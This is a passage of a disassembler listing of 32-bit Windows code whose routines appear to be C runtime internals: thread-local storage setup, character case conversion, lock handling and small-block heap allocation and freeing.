		jz	short loc_405901
		test	eax, eax
		jnz	short loc_405925

loc_405901:				; CODE XREF: sub_405886+63j
					; sub_405886+6Cj ...
		mov	eax, ds:dword_41D180
		mov	off_427448, eax
		mov	eax, ds:off_41D174
		mov	off_427444, offset sub_4055A6
		mov	off_42744C, esi
		mov	off_427450, eax

loc_405925:				; CODE XREF: sub_405886+79j
		call	ds:dword_41D17C	; TlsAlloc
		cmp	eax, 0FFFFFFFFh
		mov	dword_42368C, eax
		jz	loc_405A05
		push	off_427448
		push	eax
		call	esi	; TlsSetValue
		test	eax, eax
		jz	loc_405A05
		call	sub_407EC9
		push	off_427444
		call	sub_4054D7
		push	off_427448
		mov	off_427444, eax
		call	sub_4054D7
		push	off_42744C
		mov	off_427448, eax
		call	sub_4054D7
		push	off_427450
		mov	off_42744C, eax
		call	sub_4054D7
		add	esp, 10h
		mov	off_427450, eax
		call	sub_405C31
		test	eax, eax
		jz	short loc_405A00
		push	offset sub_405765
		push	off_427444
		call	sub_405543
		pop	ecx
		call	eax	; TlsGetValue
		cmp	eax, 0FFFFFFFFh
		mov	dword_423688, eax
		jz	short loc_405A00
		push	214h
		push	1
		call	sub_407B2A
		mov	esi, eax
		test	esi, esi
		pop	ecx
		pop	ecx
		jz	short loc_405A00
		push	esi
		push	dword_423688
		push	off_42744C
		call	sub_405543
		pop	ecx
		call	eax	; TlsGetValue
		test	eax, eax
		jz	short loc_405A00
		push	0
		push	esi
		call	sub_405616
		pop	ecx
		pop	ecx
		call	ds:dword_41D0DC	; GetCurrentThreadId
		or	dword ptr [esi+4], 0FFFFFFFFh
		mov	[esi], eax
		xor	eax, eax
		inc	eax
		jmp	short loc_405A07
; ---------------------------------------------------------------------------

loc_405A00:				; CODE XREF: sub_405886+113j
					; sub_405886+130j ...
		call	sub_4055D9

loc_405A05:				; CODE XREF: sub_405886+ADj
					; sub_405886+BEj
		xor	eax, eax

loc_405A07:				; CODE XREF: sub_405886+178j
		pop	esi
		pop	edi
		retn
sub_405886	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405A0A	proc near		; CODE XREF: sub_402B96+9Bp
					; sub_402B96+ADp ...

var_18		= dword	ptr -18h
var_10		= dword	ptr -10h
var_C		= byte ptr -0Ch
var_8		= byte ptr -8
var_7		= byte ptr -7
var_4		= byte ptr -4
var_3		= byte ptr -3
var_2		= byte ptr -2
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		push	ebx
		push	esi
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_18]
		call	sub_402ADF
		mov	ebx, [ebp+arg_0]
		mov	esi, 100h
		cmp	ebx, esi
		jnb	short loc_405A7D
		mov	ecx, [ebp+var_18]
		cmp	dword ptr [ecx+0ACh], 1
		jle	short loc_405A49
		lea	eax, [ebp+var_18]
		push	eax
		push	1
		push	ebx
		call	sub_40CDF4
		mov	ecx, [ebp+var_18]
		add	esp, 0Ch
		jmp	short loc_405A56
; ---------------------------------------------------------------------------

loc_405A49:				; CODE XREF: sub_405A0A+29j
		mov	eax, [ecx+0C8h]
		movzx	eax, byte ptr [eax+ebx*2]
		and	eax, 1

loc_405A56:				; CODE XREF: sub_405A0A+3Dj
		test	eax, eax
		jz	short loc_405A69
		mov	eax, [ecx+0CCh]
		movzx	eax, byte ptr [eax+ebx]
		jmp	loc_405B10
; ---------------------------------------------------------------------------

loc_405A69:				; CODE XREF: sub_405A0A+4Ej
					; sub_405A0A+EAj
		cmp	[ebp+var_C], 0
		jz	short loc_405A76
		mov	eax, [ebp+var_10]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_405A76:				; CODE XREF: sub_405A0A+63j
		mov	eax, ebx
		jmp	loc_405B1D
; ---------------------------------------------------------------------------

loc_405A7D:				; CODE XREF: sub_405A0A+1Dj
		mov	eax, [ebp+var_18]
		cmp	dword ptr [eax+0ACh], 1
		jle	short loc_405ABA
		mov	[ebp+arg_0], ebx
		sar	[ebp+arg_0], 8
		lea	eax, [ebp+var_18]
		push	eax
		mov	eax, [ebp+arg_0]
		and	eax, 0FFh
		push	eax
		call	sub_40CDB0
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_405ABA
		mov	al, byte ptr [ebp+arg_0]
		push	2
		mov	[ebp+var_4], al
		mov	[ebp+var_3], bl
		mov	[ebp+var_2], 0
		pop	ecx
		jmp	short loc_405ACF
; ---------------------------------------------------------------------------

loc_405ABA:				; CODE XREF: sub_405A0A+7Dj
					; sub_405A0A+9Cj
		call	sub_405B83
		mov	dword ptr [eax], 2Ah
		xor	ecx, ecx
		mov	[ebp+var_4], bl
		mov	[ebp+var_3], 0
		inc	ecx

loc_405ACF:				; CODE XREF: sub_405A0A+AEj
		mov	eax, [ebp+var_18]
		push	1
		push	dword ptr [eax+4]
		lea	edx, [ebp+var_8]
		push	3
		push	edx
		push	ecx
		lea	ecx, [ebp+var_4]
		push	ecx
		push	esi
		push	dword ptr [eax+14h]
		lea	eax, [ebp+var_18]
		push	eax
		call	sub_40C6A9
		add	esp, 24h
		test	eax, eax
		jz	loc_405A69
		cmp	eax, 1
		jnz	short loc_405B05
		movzx	eax, [ebp+var_8]
		jmp	short loc_405B10
; ---------------------------------------------------------------------------

loc_405B05:				; CODE XREF: sub_405A0A+F3j
		movzx	ecx, [ebp+var_7]
		xor	eax, eax
		mov	ah, [ebp+var_8]
		or	eax, ecx

loc_405B10:				; CODE XREF: sub_405A0A+5Aj
					; sub_405A0A+F9j
		cmp	[ebp+var_C], 0
		jz	short loc_405B1D
		mov	ecx, [ebp+var_10]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

loc_405B1D:				; CODE XREF: sub_405A0A+6Ej
					; sub_405A0A+10Aj
		pop	esi
		pop	ebx
		leave
		retn
sub_405A0A	endp


; =============== S U B	R O U T	I N E =======================================



sub_405B21	proc near		; CODE XREF: sub_410C6D+19p
					; sub_410C6D+36p

arg_0		= dword	ptr  4

		cmp	dword_427420, 0
		jnz	short loc_405B3A
		mov	eax, [esp+arg_0]
		lea	ecx, [eax-41h]
		cmp	ecx, 19h
		ja	short locret_405B47
		add	eax, 20h
		retn
; ---------------------------------------------------------------------------

loc_405B3A:				; CODE XREF: sub_405B21+7j
		push	0
		push	[esp+4+arg_0]
		call	sub_405A0A
		pop	ecx
		pop	ecx

locret_405B47:				; CODE XREF: sub_405B21+13j
		retn
sub_405B21	endp


; =============== S U B	R O U T	I N E =======================================



sub_405B48	proc near		; CODE XREF: sub_4039C3+80p
					; sub_405BA9+Dp ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		xor	ecx, ecx

loc_405B4E:				; CODE XREF: sub_405B48+13j
		cmp	eax, dword_423690[ecx*8]
		jz	short loc_405B69
		inc	ecx
		cmp	ecx, 2Dh
		jl	short loc_405B4E
		lea	ecx, [eax-13h]
		cmp	ecx, 11h
		ja	short loc_405B71
		push	0Dh
		pop	eax
		retn
; ---------------------------------------------------------------------------

loc_405B69:				; CODE XREF: sub_405B48+Dj
		mov	eax, dword_423694[ecx*8]
		retn
; ---------------------------------------------------------------------------

loc_405B71:				; CODE XREF: sub_405B48+1Bj
		add	eax, 0FFFFFF44h
		push	0Eh
		pop	ecx
		cmp	ecx, eax
		sbb	eax, eax
		and	eax, ecx
		add	eax, 8
		retn
sub_405B48	endp


; =============== S U B	R O U T	I N E =======================================



sub_405B83	proc near		; CODE XREF: sub_402B96+19p
					; sub_402B96+4Fp ...
		call	sub_4056CA
		test	eax, eax
		jnz	short loc_405B92
		mov	eax, offset dword_4237F8
		retn
; ---------------------------------------------------------------------------

loc_405B92:				; CODE XREF: sub_405B83+7j
		add	eax, 8
		retn
sub_405B83	endp


; =============== S U B	R O U T	I N E =======================================



sub_405B96	proc near		; CODE XREF: sub_405BA9+1p
					; sub_408E91+14p ...
		call	sub_4056CA
		test	eax, eax
		jnz	short loc_405BA5
		mov	eax, offset dword_4237FC
		retn
; ---------------------------------------------------------------------------

loc_405BA5:				; CODE XREF: sub_405B96+7j
		add	eax, 0Ch
		retn
sub_405B96	endp


; =============== S U B	R O U T	I N E =======================================



sub_405BA9	proc near		; CODE XREF: sub_408DFD+84p
					; sub_40A15D+3FBp ...

arg_0		= dword	ptr  4

		push	esi
		call	sub_405B96
		mov	ecx, [esp+4+arg_0]
		push	ecx
		mov	[eax], ecx
		call	sub_405B48
		pop	ecx
		mov	esi, eax
		call	sub_405B83
		mov	[eax], esi
		pop	esi
		retn
sub_405BA9	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405BD0	proc near		; CODE XREF: sub_402CB9+9Ap
					; sub_402DA9+42j

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	edi
		push	esi
		push	ebx
		mov	ecx, [ebp+arg_8]
		or	ecx, ecx
		jz	short loc_405C2A
		mov	esi, [ebp+arg_0]
		mov	edi, [ebp+arg_4]
		mov	bh, 41h
		mov	bl, 5Ah
		mov	dh, 20h
		lea	ecx, [ecx+0]

loc_405BEC:				; CODE XREF: sub_405BD0+49j
		mov	ah, [esi]
		or	ah, ah
		mov	al, [edi]
		jz	short loc_405C1B
		or	al, al
		jz	short loc_405C1B
		add	esi, 1
		add	edi, 1
		cmp	ah, bh
		jb	short loc_405C08
		cmp	ah, bl
		ja	short loc_405C08
		add	ah, dh

loc_405C08:				; CODE XREF: sub_405BD0+30j
					; sub_405BD0+34j
		cmp	al, bh
		jb	short loc_405C12
		cmp	al, bl
		ja	short loc_405C12
		add	al, dh

loc_405C12:				; CODE XREF: sub_405BD0+3Aj
					; sub_405BD0+3Ej
		cmp	ah, al
		jnz	short loc_405C21
		sub	ecx, 1
		jnz	short loc_405BEC

loc_405C1B:				; CODE XREF: sub_405BD0+22j
					; sub_405BD0+26j
		xor	ecx, ecx
		cmp	ah, al
		jz	short loc_405C2A

loc_405C21:				; CODE XREF: sub_405BD0+44j
		mov	ecx, 0FFFFFFFFh
		jb	short loc_405C2A
		neg	ecx

loc_405C2A:				; CODE XREF: sub_405BD0+Bj
					; sub_405BD0+4Fj ...
		mov	eax, ecx
		pop	ebx
		pop	esi
		pop	edi
		leave
		retn
sub_405BD0	endp


; =============== S U B	R O U T	I N E =======================================



sub_405C31	proc near		; CODE XREF: sub_405886+10Cp
		push	esi
		push	edi
		xor	esi, esi
		mov	edi, offset dword_427458

loc_405C3A:				; CODE XREF: sub_405C31+35j
		cmp	dword_423804[esi*8], 1
		jnz	short loc_405C62
		lea	eax, ds:423800h[esi*8]
		mov	[eax], edi
		push	0FA0h
		push	dword ptr [eax]
		add	edi, 18h
		call	sub_40CEC4
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_405C6E

loc_405C62:				; CODE XREF: sub_405C31+11j
		inc	esi
		cmp	esi, 24h
		jl	short loc_405C3A
		xor	eax, eax
		inc	eax

loc_405C6B:				; CODE XREF: sub_405C31+47j
		pop	edi
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_405C6E:				; CODE XREF: sub_405C31+2Fj
		and	off_423800[esi*8], 0
		xor	eax, eax
		jmp	short loc_405C6B
sub_405C31	endp


; =============== S U B	R O U T	I N E =======================================



sub_405C7A	proc near		; CODE XREF: sub_4055D9:loc_405611j
		push	ebx
		mov	ebx, ds:off_41D16C
		push	esi
		mov	esi, offset off_423800
		push	edi

loc_405C88:				; CODE XREF: sub_405C7A+30j
		mov	edi, [esi]
		test	edi, edi
		jz	short loc_405CA1
		cmp	dword ptr [esi+4], 1
		jz	short loc_405CA1
		push	edi
		call	ebx ; sub_451958
		push	edi
		call	sub_4039C3
		and	dword ptr [esi], 0
		pop	ecx

loc_405CA1:				; CODE XREF: sub_405C7A+12j
					; sub_405C7A+18j
		add	esi, 8
		cmp	esi, offset dword_423920
		jl	short loc_405C88
		mov	esi, offset off_423800
		pop	edi

loc_405CB2:				; CODE XREF: sub_405C7A+50j
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_405CC1
		cmp	dword ptr [esi+4], 1
		jnz	short loc_405CC1
		push	eax
		call	ebx ; sub_451958

loc_405CC1:				; CODE XREF: sub_405C7A+3Cj
					; sub_405C7A+42j
		add	esi, 8
		cmp	esi, offset dword_423920
		jl	short loc_405CB2
		pop	esi
		pop	ebx
		retn
sub_405C7A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405CCF	proc near		; CODE XREF: sub_402E9F+2p
					; sub_403A19+2p ...

arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_0]
		push	off_423800[eax*8]
		call	ds:dword_41D168	; RtlLeaveCriticalSection
		pop	ebp
		retn
sub_405CCF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405CE4	proc near		; CODE XREF: sub_405DA7+14p
					; sub_408851+4Fp ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_4217E8
		call	__SEH_prolog4
		xor	edi, edi
		inc	edi
		mov	[ebp+var_1C], edi
		xor	ebx, ebx
		cmp	dword_4275A8, ebx
		jnz	short loc_405D18
		call	sub_40A004
		push	1Eh
		call	sub_409E64
		push	0FFh
		call	sub_407C57
		pop	ecx
		pop	ecx

loc_405D18:				; CODE XREF: sub_405CE4+1Aj
		mov	esi, [ebp+arg_0]
		lea	esi, ds:423800h[esi*8]
		cmp	[esi], ebx
		jz	short loc_405D2A
		mov	eax, edi
		jmp	short loc_405D98
; ---------------------------------------------------------------------------

loc_405D2A:				; CODE XREF: sub_405CE4+40j
		push	18h
		call	sub_407AEA
		pop	ecx
		mov	edi, eax
		cmp	edi, ebx
		jnz	short loc_405D47
		call	sub_405B83
		mov	dword ptr [eax], 0Ch
		xor	eax, eax
		jmp	short loc_405D98
; ---------------------------------------------------------------------------

loc_405D47:				; CODE XREF: sub_405CE4+52j
		push	0Ah
		call	sub_405DA7
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		cmp	[esi], ebx
		jnz	short loc_405D82
		push	0FA0h
		push	edi
		call	sub_40CEC4
		pop	ecx
		pop	ecx
		test	eax, eax
		jnz	short loc_405D7E
		push	edi
		call	sub_4039C3
		pop	ecx
		call	sub_405B83
		mov	dword ptr [eax], 0Ch
		mov	[ebp+var_1C], ebx
		jmp	short loc_405D89
; ---------------------------------------------------------------------------

loc_405D7E:				; CODE XREF: sub_405CE4+81j
		mov	[esi], edi
		jmp	short loc_405D89
; ---------------------------------------------------------------------------

loc_405D82:				; CODE XREF: sub_405CE4+70j
		push	edi
		call	sub_4039C3
		pop	ecx

loc_405D89:				; CODE XREF: sub_405CE4+98j
					; sub_405CE4+9Cj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_405D9E
		mov	eax, [ebp+var_1C]

loc_405D98:				; CODE XREF: sub_405CE4+44j
					; sub_405CE4+61j
		call	__SEH_epilog4
		retn
sub_405CE4	endp


; =============== S U B	R O U T	I N E =======================================



sub_405D9E	proc near		; CODE XREF: sub_405CE4+ACp
					; DATA XREF: _1fieagrn:00421800o
		push	0Ah
		call	sub_405CCF
		pop	ecx
		retn
sub_405D9E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405DA7	proc near		; CODE XREF: sub_402E05+44p
					; sub_4039C3+1Ep ...

arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_0]
		push	esi
		lea	esi, ds:423800h[eax*8]
		cmp	dword ptr [esi], 0
		jnz	short loc_405DCD
		push	eax
		call	sub_405CE4
		test	eax, eax
		pop	ecx
		jnz	short loc_405DCD
		push	11h
		call	sub_407C0D
		pop	ecx

loc_405DCD:				; CODE XREF: sub_405DA7+11j
					; sub_405DA7+1Cj
		push	dword ptr [esi]
		call	ds:dword_41D164	; RtlEnterCriticalSection
		pop	esi
		pop	ebp
		retn
sub_405DA7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405DD8	proc near		; CODE XREF: sub_405E33:loc_405E56p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	esi
		lea	eax, [ebp+var_4]
		xor	esi, esi
		push	eax
		mov	[ebp+var_4], esi
		mov	[ebp+var_8], esi
		call	sub_407CB6
		test	eax, eax
		pop	ecx
		jz	short loc_405E01
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4031FD
		add	esp, 14h

loc_405E01:				; CODE XREF: sub_405DD8+1Aj
		lea	eax, [ebp+var_8]
		push	eax
		call	sub_407CED
		test	eax, eax
		pop	ecx
		jz	short loc_405E1C
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4031FD
		add	esp, 14h

loc_405E1C:				; CODE XREF: sub_405DD8+35j
		cmp	[ebp+var_4], 2
		pop	esi
		jnz	short loc_405E2E
		cmp	[ebp+var_8], 5
		jb	short loc_405E2E
		xor	eax, eax
		inc	eax
		leave
		retn
; ---------------------------------------------------------------------------

loc_405E2E:				; CODE XREF: sub_405DD8+49j
					; sub_405DD8+4Fj
		push	3
		pop	eax
		leave
		retn
sub_405DD8	endp


; =============== S U B	R O U T	I N E =======================================



sub_405E33	proc near		; CODE XREF: sub_4044D2-10Fp

arg_0		= dword	ptr  4

		xor	eax, eax
		cmp	[esp+arg_0], eax
		push	0
		setz	al
		push	1000h
		push	eax
		call	ds:dword_41D15C	; HeapCreate
		test	eax, eax
		mov	dword_4275A8, eax
		jnz	short loc_405E56

loc_405E53:				; CODE XREF: sub_405E33+54j
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_405E56:				; CODE XREF: sub_405E33+1Ej
		call	sub_405DD8
		cmp	eax, 3
		mov	dword_436454, eax
		jnz	short loc_405E89
		push	3F8h
		call	sub_405E8D
		test	eax, eax
		pop	ecx
		jnz	short loc_405E89
		push	dword_4275A8
		call	ds:off_41D160
		and	dword_4275A8, 0
		jmp	short loc_405E53
; ---------------------------------------------------------------------------

loc_405E89:				; CODE XREF: sub_405E33+30j
					; sub_405E33+3Fj
		xor	eax, eax
		inc	eax
		retn
sub_405E33	endp


; =============== S U B	R O U T	I N E =======================================



sub_405E8D	proc near		; CODE XREF: sub_405E33+37p

arg_0		= dword	ptr  4

		push	140h
		push	0
		push	dword_4275A8
		call	ds:dword_41D110	; RtlAllocateHeap
		test	eax, eax
		mov	dword_436440, eax
		jnz	short loc_405EAA
		retn
; ---------------------------------------------------------------------------

loc_405EAA:				; CODE XREF: sub_405E8D+1Aj
		mov	ecx, [esp+arg_0]
		and	dword_4275AC, 0
		and	dword_43643C, 0
		mov	dword_436448, eax
		xor	eax, eax
		mov	dword_436444, ecx
		mov	dword_43644C, 10h
		inc	eax
		retn
sub_405E8D	endp


; =============== S U B	R O U T	I N E =======================================



sub_405ED5	proc near		; CODE XREF: sub_402E05+4Ep
					; sub_4039C3+29p ...

arg_0		= dword	ptr  4

		mov	ecx, dword_43643C
		mov	eax, dword_436440
		imul	ecx, 14h
		add	ecx, eax
		jmp	short loc_405EF9
; ---------------------------------------------------------------------------

loc_405EE7:				; CODE XREF: sub_405ED5+26j
		mov	edx, [esp+arg_0]
		sub	edx, [eax+0Ch]
		cmp	edx, 100000h
		jb	short locret_405EFF
		add	eax, 14h

loc_405EF9:				; CODE XREF: sub_405ED5+10j
		cmp	eax, ecx
		jb	short loc_405EE7
		xor	eax, eax

locret_405EFF:				; CODE XREF: sub_405ED5+1Fj
		retn
sub_405ED5	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405F00	proc near		; CODE XREF: sub_4039C3+38p
					; sub_40DE1D+B5p ...

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	ecx, [ebp+arg_0]
		mov	eax, [ecx+10h]
		push	esi
		mov	esi, [ebp+arg_4]
		push	edi
		mov	edi, esi
		sub	edi, [ecx+0Ch]
		add	esi, 0FFFFFFFCh
		shr	edi, 0Fh
		mov	ecx, edi
		imul	ecx, 204h
		lea	ecx, [ecx+eax+144h]
		mov	[ebp+var_10], ecx
		mov	ecx, [esi]
		dec	ecx
		test	cl, 1
		mov	[ebp+var_4], ecx
		jnz	loc_406210
		push	ebx
		lea	ebx, [ecx+esi]
		mov	edx, [ebx]
		mov	[ebp+var_C], edx
		mov	edx, [esi-4]
		mov	[ebp+var_8], edx
		mov	edx, [ebp+var_C]
		test	dl, 1
		mov	[ebp+arg_4], ebx
		jnz	short loc_405FCB
		sar	edx, 4
		dec	edx
		cmp	edx, 3Fh
		jbe	short loc_405F63
		push	3Fh
		pop	edx

loc_405F63:				; CODE XREF: sub_405F00+5Ej
		mov	ecx, [ebx+4]
		cmp	ecx, [ebx+8]
		jnz	short loc_405FAD
		cmp	edx, 20h
		mov	ebx, 80000000h
		jnb	short loc_405F8E
		mov	ecx, edx
		shr	ebx, cl
		lea	ecx, [edx+eax+4]
		not	ebx
		and	[eax+edi*4+44h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_405FAA
		mov	ecx, [ebp+arg_0]
		and	[ecx], ebx
		jmp	short loc_405FAA
; ---------------------------------------------------------------------------

loc_405F8E:				; CODE XREF: sub_405F00+73j
		lea	ecx, [edx-20h]
		shr	ebx, cl
		lea	ecx, [edx+eax+4]
		not	ebx
		and	[eax+edi*4+0C4h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_405FAA
		mov	ecx, [ebp+arg_0]
		and	[ecx+4], ebx

loc_405FAA:				; CODE XREF: sub_405F00+85j
					; sub_405F00+8Cj ...
		mov	ebx, [ebp+arg_4]

loc_405FAD:				; CODE XREF: sub_405F00+69j
		mov	edx, [ebx+8]
		mov	ebx, [ebx+4]
		mov	ecx, [ebp+var_4]
		add	ecx, [ebp+var_C]
		mov	[edx+4], ebx
		mov	edx, [ebp+arg_4]
		mov	ebx, [edx+4]
		mov	edx, [edx+8]
		mov	[ebx+8], edx
		mov	[ebp+var_4], ecx

loc_405FCB:				; CODE XREF: sub_405F00+55j
		mov	edx, ecx
		sar	edx, 4
		dec	edx
		cmp	edx, 3Fh
		jbe	short loc_405FD9
		push	3Fh
		pop	edx

loc_405FD9:				; CODE XREF: sub_405F00+D4j
		mov	ebx, [ebp+var_8]
		and	ebx, 1
		mov	[ebp+var_C], ebx
		jnz	loc_406077
		sub	esi, [ebp+var_8]
		mov	ebx, [ebp+var_8]
		sar	ebx, 4
		push	3Fh
		mov	[ebp+arg_4], esi
		dec	ebx
		pop	esi
		cmp	ebx, esi
		jbe	short loc_405FFE
		mov	ebx, esi

loc_405FFE:				; CODE XREF: sub_405F00+FAj
		add	ecx, [ebp+var_8]
		mov	edx, ecx
		sar	edx, 4
		dec	edx
		cmp	edx, esi
		mov	[ebp+var_4], ecx
		jbe	short loc_406010
		mov	edx, esi

loc_406010:				; CODE XREF: sub_405F00+10Cj
		cmp	ebx, edx
		jz	short loc_406072
		mov	ecx, [ebp+arg_4]
		mov	esi, [ecx+4]
		cmp	esi, [ecx+8]
		jnz	short loc_40605A
		cmp	ebx, 20h
		mov	esi, 80000000h
		jnb	short loc_406040
		mov	ecx, ebx
		shr	esi, cl
		not	esi
		and	[eax+edi*4+44h], esi
		dec	byte ptr [ebx+eax+4]
		jnz	short loc_40605A
		mov	ecx, [ebp+arg_0]
		and	[ecx], esi
		jmp	short loc_40605A
; ---------------------------------------------------------------------------

loc_406040:				; CODE XREF: sub_405F00+127j
		lea	ecx, [ebx-20h]
		shr	esi, cl
		not	esi
		and	[eax+edi*4+0C4h], esi
		dec	byte ptr [ebx+eax+4]
		jnz	short loc_40605A
		mov	ecx, [ebp+arg_0]
		and	[ecx+4], esi

loc_40605A:				; CODE XREF: sub_405F00+11Dj
					; sub_405F00+137j ...
		mov	ecx, [ebp+arg_4]
		mov	esi, [ecx+8]
		mov	ecx, [ecx+4]
		mov	[esi+4], ecx
		mov	ecx, [ebp+arg_4]
		mov	esi, [ecx+4]
		mov	ecx, [ecx+8]
		mov	[esi+8], ecx

loc_406072:				; CODE XREF: sub_405F00+112j
		mov	esi, [ebp+arg_4]
		jmp	short loc_40607A
; ---------------------------------------------------------------------------

loc_406077:				; CODE XREF: sub_405F00+E2j
		mov	ebx, [ebp+arg_0]

loc_40607A:				; CODE XREF: sub_405F00+175j
		cmp	[ebp+var_C], 0
		jnz	short loc_406088
		cmp	ebx, edx
		jz	loc_406108

loc_406088:				; CODE XREF: sub_405F00+17Ej
		mov	ecx, [ebp+var_10]
		lea	ecx, [ecx+edx*8]
		mov	ebx, [ecx+4]
		mov	[esi+8], ecx
		mov	[esi+4], ebx
		mov	[ecx+4], esi
		mov	ecx, [esi+4]
		mov	[ecx+8], esi
		mov	ecx, [esi+4]
		cmp	ecx, [esi+8]
		jnz	short loc_406108
		mov	cl, [edx+eax+4]
		mov	byte ptr [ebp+arg_4+3],	cl
		inc	cl
		cmp	edx, 20h
		mov	[edx+eax+4], cl
		jnb	short loc_4060DF
		cmp	byte ptr [ebp+arg_4+3],	0
		jnz	short loc_4060CE
		mov	ecx, edx
		mov	ebx, 80000000h
		shr	ebx, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx], ebx

loc_4060CE:				; CODE XREF: sub_405F00+1BEj
		mov	ebx, 80000000h
		mov	ecx, edx
		shr	ebx, cl
		lea	eax, [eax+edi*4+44h]
		or	[eax], ebx
		jmp	short loc_406108
; ---------------------------------------------------------------------------

loc_4060DF:				; CODE XREF: sub_405F00+1B8j
		cmp	byte ptr [ebp+arg_4+3],	0
		jnz	short loc_4060F5
		lea	ecx, [edx-20h]
		mov	ebx, 80000000h
		shr	ebx, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx+4], ebx

loc_4060F5:				; CODE XREF: sub_405F00+1E3j
		lea	ecx, [edx-20h]
		mov	edx, 80000000h
		shr	edx, cl
		lea	eax, [eax+edi*4+0C4h]
		or	[eax], edx

loc_406108:				; CODE XREF: sub_405F00+182j
					; sub_405F00+1A6j ...
		mov	eax, [ebp+var_4]
		mov	[esi], eax
		mov	[eax+esi-4], eax
		mov	eax, [ebp+var_10]
		dec	dword ptr [eax]
		jnz	loc_40620F
		mov	eax, dword_4275AC
		test	eax, eax
		jz	loc_406201
		mov	ecx, dword_436450
		mov	esi, ds:off_41D158
		push	4000h
		shl	ecx, 0Fh
		add	ecx, [eax+0Ch]
		mov	ebx, 8000h
		push	ebx
		push	ecx
		call	esi ; sub_44412E
		mov	ecx, dword_436450
		mov	eax, dword_4275AC
		mov	edx, 80000000h
		shr	edx, cl
		or	[eax+8], edx
		mov	eax, dword_4275AC
		mov	eax, [eax+10h]
		mov	ecx, dword_436450
		and	dword ptr [eax+ecx*4+0C4h], 0
		mov	eax, dword_4275AC
		mov	eax, [eax+10h]
		dec	byte ptr [eax+43h]
		mov	eax, dword_4275AC
		mov	ecx, [eax+10h]
		cmp	byte ptr [ecx+43h], 0
		jnz	short loc_406196
		and	dword ptr [eax+4], 0FFFFFFFEh
		mov	eax, dword_4275AC

loc_406196:				; CODE XREF: sub_405F00+28Bj
		cmp	dword ptr [eax+8], 0FFFFFFFFh
		jnz	short loc_406201
		push	ebx
		push	0
		push	dword ptr [eax+0Ch]
		call	esi ; sub_44412E
		mov	eax, dword_4275AC
		push	dword ptr [eax+10h]
		push	0
		push	dword_4275A8
		call	ds:dword_41D108	; RtlFreeHeap
		mov	ecx, dword_43643C
		mov	eax, dword_4275AC
		imul	ecx, 14h
		mov	edx, dword_436440
		sub	ecx, eax
		lea	ecx, [ecx+edx-14h]
		push	ecx
		lea	ecx, [eax+14h]
		push	ecx
		push	eax
		call	sub_407720
		mov	eax, [ebp+arg_0]
		add	esp, 0Ch
		dec	dword_43643C
		cmp	eax, dword_4275AC
		jbe	short loc_4061F7
		sub	[ebp+arg_0], 14h

loc_4061F7:				; CODE XREF: sub_405F00+2F1j
		mov	eax, dword_436440
		mov	dword_436448, eax

loc_406201:				; CODE XREF: sub_405F00+223j
					; sub_405F00+29Aj
		mov	eax, [ebp+arg_0]
		mov	dword_4275AC, eax
		mov	dword_436450, edi

loc_40620F:				; CODE XREF: sub_405F00+216j
		pop	ebx

loc_406210:				; CODE XREF: sub_405F00+37j
		pop	edi
		pop	esi
		leave
		retn
sub_405F00	endp


; =============== S U B	R O U T	I N E =======================================



sub_406214	proc near		; CODE XREF: sub_4066A9+C0p
		mov	eax, dword_43644C
		push	esi
		mov	esi, dword_43643C
		push	edi
		xor	edi, edi
		cmp	esi, eax
		jnz	short loc_40625B
		add	eax, 10h
		imul	eax, 14h
		push	eax
		push	dword_436440
		push	edi
		push	dword_4275A8
		call	ds:off_41D150
		cmp	eax, edi
		jnz	short loc_406249

loc_406245:				; CODE XREF: sub_406214+68j
					; sub_406214+94j
		xor	eax, eax
		jmp	short loc_4062C1
; ---------------------------------------------------------------------------

loc_406249:				; CODE XREF: sub_406214+2Fj
		add	dword_43644C, 10h
		mov	esi, dword_43643C
		mov	dword_436440, eax

loc_40625B:				; CODE XREF: sub_406214+11j
		imul	esi, 14h
		add	esi, dword_436440
		push	41C4h
		push	8
		push	dword_4275A8
		call	ds:dword_41D110	; RtlAllocateHeap
		cmp	eax, edi
		mov	[esi+10h], eax
		jz	short loc_406245
		push	4
		push	2000h
		push	100000h
		push	edi
		call	ds:off_41D154
		cmp	eax, edi
		mov	[esi+0Ch], eax
